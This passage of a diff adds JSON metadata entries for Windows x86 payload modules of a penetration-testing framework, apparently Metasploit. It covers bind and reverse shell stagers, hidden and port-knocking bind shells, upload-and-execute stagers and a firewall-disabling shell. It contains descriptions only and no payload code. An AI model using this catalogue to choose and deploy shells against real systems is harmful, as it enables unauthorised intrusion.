"Spawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/shell/bind_tcp_rc4": { + "name": "Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/shell/bind_tcp_uuid": { + "name": "Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/shell/find_tag": { + "name": "Windows Command Shell, Find Tag Ordinal Stager", + "fullname": "payload/windows/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/shell/reverse_ipv6_tcp": { + "name": "Windows Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/shell/reverse_nonx_tcp": { + "name": "Windows Command Shell, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/shell/reverse_ord_tcp": { + "name": "Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/shell/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/shell/reverse_tcp": { + "name": "Windows Command Shell, Reverse TCP Stager", + "fullname": "payload/windows/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/shell/reverse_tcp_allports": { + "name": "Windows Command Shell, Reverse All-Port TCP Stager", + "fullname": "payload/windows/shell/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/shell/reverse_tcp_dns": { + "name": "Windows Command Shell, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/shell/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/shell/reverse_tcp_rc4": { + "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/shell/reverse_tcp_rc4_dns": { + "name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/shell/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/shell/reverse_tcp_uuid": { + "name": "Windows Command Shell, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/shell/reverse_udp": { + "name": "Windows Command Shell, Reverse UDP Stager with UUID Support", + "fullname": "payload/windows/shell/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "RageLtMan " + ], + "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_udp.rb", + "is_install_path": true, + "ref_name": "windows/shell/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/reverse_udp" + }, + "payload_windows/shell_bind_tcp": { + "name": "Windows Command Shell, Bind TCP Inline", + "fullname": "payload/windows/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell_bind_tcp_xpfw": { + "name": "Windows Disable Windows ICF, Command Shell, Bind TCP Inline", + "fullname": "payload/windows/shell_bind_tcp_xpfw", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Lin0xx " + ], + "description": "Disable the Windows ICF, then listen for a connection and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb", + "is_install_path": true, + "ref_name": "windows/shell_bind_tcp_xpfw", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell_hidden_bind_tcp": { + "name": "Windows Command Shell, Hidden Bind TCP Inline", + "fullname": "payload/windows/shell_hidden_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sd", + "Borja Merino " + ], + "description": "Listen for a connection from certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connections is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\" helping us to hide the shellcode.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell_hidden_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell_reverse_tcp": { + "name": "Windows Command Shell, Reverse TCP Inline", + "fullname": "payload/windows/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/speak_pwned": { + "name": "Windows Speech API - Say \"You Got Pwned!\"", + "fullname": "payload/windows/speak_pwned", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Berend-Jan \"SkyLined\" Wever " + ], + "description": "Causes the target to say \"You Got Pwned\" via the Windows Speech API", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/speak_pwned.rb", + "is_install_path": true, + "ref_name": "windows/speak_pwned", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/upexec/bind_hidden_ipknock_tcp": { + "name": "Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/upexec/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/upexec/bind_hidden_tcp": { + "name": "Windows Upload/Execute, Hidden Bind TCP Stager", + "fullname": "payload/windows/upexec/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/upexec/bind_ipv6_tcp": { + "name": "Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/upexec/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/upexec/bind_ipv6_tcp_uuid": { + "name": "Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/upexec/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/upexec/bind_named_pipe": { + "name": "Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/upexec/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "UserExistsError" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/upexec/bind_nonx_tcp": { + "name": "Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/upexec/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/upexec/bind_tcp": { + "name": "Windows Upload/Execute, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/upexec/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/upexec/bind_tcp_rc4": { + "name": "Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/upexec/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/upexec/bind_tcp_uuid": { + "name": "Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/upexec/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Uploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/upexec/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/upexec/find_tag": { + "name": "Windows Upload/Execute, Find Tag Ordinal Stager", + "fullname": "payload/windows/upexec/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/upexec/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/upexec/reverse_ipv6_tcp": { + "name": "Windows Upload/Execute, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/upexec/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/upexec/reverse_nonx_tcp": { + "name": "Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/upexec/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/upexec/reverse_ord_tcp": { + "name": "Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/upexec/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "spoonm " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/upexec/reverse_tcp": { + "name": "Windows Upload/Execute, Reverse TCP Stager", + "fullname": "payload/windows/upexec/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": 